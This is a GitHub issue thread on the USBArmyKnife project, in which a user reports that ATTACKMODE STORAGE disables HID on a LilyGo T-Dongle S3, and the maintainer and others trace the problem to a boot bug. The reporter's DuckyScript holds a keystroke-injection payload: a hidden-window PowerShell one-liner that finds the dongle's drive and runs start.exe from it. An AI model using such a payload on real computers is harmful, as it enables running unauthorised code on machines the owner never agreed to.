i-am-shodan/USBArmyKnife #63: ATTACKMODE STORAGE breaks HID

corrupt3k, 2025-02-05:
## Your problem

Once the device runs ATTACKMODE STORAGE, HID no longer works.
HID Device no longer shows up in Device Manager.

## Your device

```txt
LilyGo T-Dongle S3
```

# Language (HID attacks only)

## Your DuckyScript

```yaml
ATTACKMODE STORAGE

GUI R
DELAY 1000
STRING powershell -Noni -NoP -W h .((gwmi win32_volume -f 'label=''MYDRIVE''').Name+'start.exe')
DELAY 1000
ENTER
```

## Your debug logs

```txt
Device started with USB Device type NOT set to None, this is recommended when using ATTACKMODE command
Changing USB mode to STORAGE
USB reset
```

- I confirm I have read the FAQ: Yes
- I confirm I am using the latest release: Yes

## Additional information
I tried setting the USB Device type to None. That causes the T-Dongle to stop booting and a yellow LED turns on.

i-am-shodan, 2025-02-05:
This is by design. You want:

ATTACKMODE HID STORAGE

corrupt3k, 2025-02-05:
I changed it to ATTACKMODE HID STORAGE
The storage shows up. The HID device does not.

Device started with USB Device type NOT set to None, this is recommended when using ATTACKMODE command
Changing USB mode to HID
USB reset

i-am-shodan, 2025-02-05:
You should try what the message says. Go into the settings tab and set the USB device type to None.

That way when the device turns on the USB stack won't be configured. When the script runs and you use the ATTACKMODE command it will configure the USB stack.

corrupt3k, 2025-02-05:
I tried setting the USB Device type to None.
That causes the T-Dongle to stop booting properly and the screen flashes black and white repeatedly.
No web interface either when this happens.

i-am-shodan, 2025-02-05:
That's the bug to open

SnowGlobeio, 2025-02-06:
> I tried setting the USB Device type to None. That causes the T-Dongle to stop booting properly and the screen flashes black and white repeatedly. No web interface either when this happens.

I had the same problem. I'll open a bug about it.